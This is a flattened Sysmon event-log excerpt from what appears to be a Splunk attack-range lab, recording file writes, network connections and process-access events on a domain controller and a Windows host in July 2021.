Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B0854B1DE6B008DC7F67D0E4BAE5E058,SHA256=B3B01F83BE02BAAE00D43FA9F87AFEE59A7FFADAB1D96F53533C7425521F7722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C5AC7B843A47AFB4599AA76F5FBBEDCF,SHA256=7203224979923F4779609AF108B55B901F4140C270A2536BDC0279706463CF0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7198EDEDD5ED0F42C41F54712EE0ED3D,SHA256=23EBD624B4E351A343993BF56D695C42B932CE591175053DA0BC66F32EF13339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8668268109A0E4C5B689CA70F555D145,SHA256=5FA6879A6B7370CED4C6C09D45349BA9C74613C7611472DE110CEF85B8BA47A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.360{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=35160FBAB44DB0FDA6AB88B86E548F2F,SHA256=A29056E2AEFE556AA3233D5397077DD35D5B12F3888D79DE9DC0CD79CFE81409,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:08.102{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61976-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:08.102{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61976-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001054905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:07.568{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61975-false10.0.1.12-8000- 23542300x80000000000000001054904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:16.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF950364EA15D6AC323C9A3D224AE832,SHA256=5758489E8C36A8ECA2493446390EDE6C974D35B3595CD310616982F2B9CA106C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810437Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:17.827{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67C598222998989C42E1BA0A3AF67D5A,SHA256=DD17192769CAAA68EA85F7BDAE3BAE76D8E133E07C96197ADB07E3408B0A8AC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:17.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EC3629224B262C893D815BEF41D337F,SHA256=CE36E42210F4C68DACE595000F26181AF6F99A8FF4AAD6CDE6E933C5BCF0195A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:18.890{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B508D604BD4FB68F4D093A6D085BF1D0,SHA256=A7664AC1DAC2A27123814567B5B47C457242D6BB911CA7970C3B31AE271F6114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:18.574{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:18.040{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26127288895E3C01ECFA5A04D949D818,SHA256=1E9014A1EA36E0DB8BF38EEC868435453AF74BD9D87F470CD3FB89BB43517902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:19.905{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8776E8075B344F2EADDD0340C96B17CE,SHA256=0CD4C895134D147AE423C1F9970370500392CEE1EFD939543FCD70925C69B49C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:19.058{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F62D20E7DF090547E1FE482200FD234,SHA256=D7FFD4DE12FD0E07FF854D83C9129F6AA8C69341CE939098815950B7808445EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:20.905{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E888EB65EFB4D04B64D84242826CDE0,SHA256=2B07165EE8148698457B38FA811A56C1EBE91F94C790F29FAFED94216D540BE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:20.073{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B02CB10FA2218ED7027A93606E783E2E,SHA256=1C5A807CCBD146604090082A9C98B100108F70304E4D0360521783EA2A9CFFDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:20.874{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:19.289{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57469-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:21.921{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A66F15354B3F307E49DB380B379168C1,SHA256=46D87CC9A238B27F782C681B057518B1924CC153A4D13158A3423761D5DCC3BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:12.707{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61977-false10.0.1.12-8000- 23542300x80000000000000001054924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:21.073{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=643EEECF5189910F69E08B129CD3959C,SHA256=DB2038D0889EFB19ADD15FB69236FFA714940255FFA33FD21476DCA0564675AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:22.968{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EFC302E3A746C63E3547E298AB827AD,SHA256=2D9CF49546E9532ED394C9EA69940D4A40D386115751492E283AC684E6D3541E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:22.090{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D4AD6F9DA5CDD7B178AFDB28FEC58DD,SHA256=5BE1E4BB476F1D885E5E04B3598EE2D29168E0F5C2244B18A1834CCCC5C6FF72,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:21.008{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57470-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001054927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:23.091{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D24D07E655C8A7442FBF10791360CB44,SHA256=A916618F10CD53E8B6CB658906A2C646B530862DE877DF39955106ECAB11717B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:24.122{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E512E8FAAE9B3BEA489E0A3FC8D63A24,SHA256=C57E7D9C4A217F5159CB6A2908083BC3DF71E663F7865D43438A28A1F1A747DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810466Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810465Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810464Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810463Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810462Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.968{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810461Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:24.953{0C1E0330-F878-60EB-E479-00000000D001}3092C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810460Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 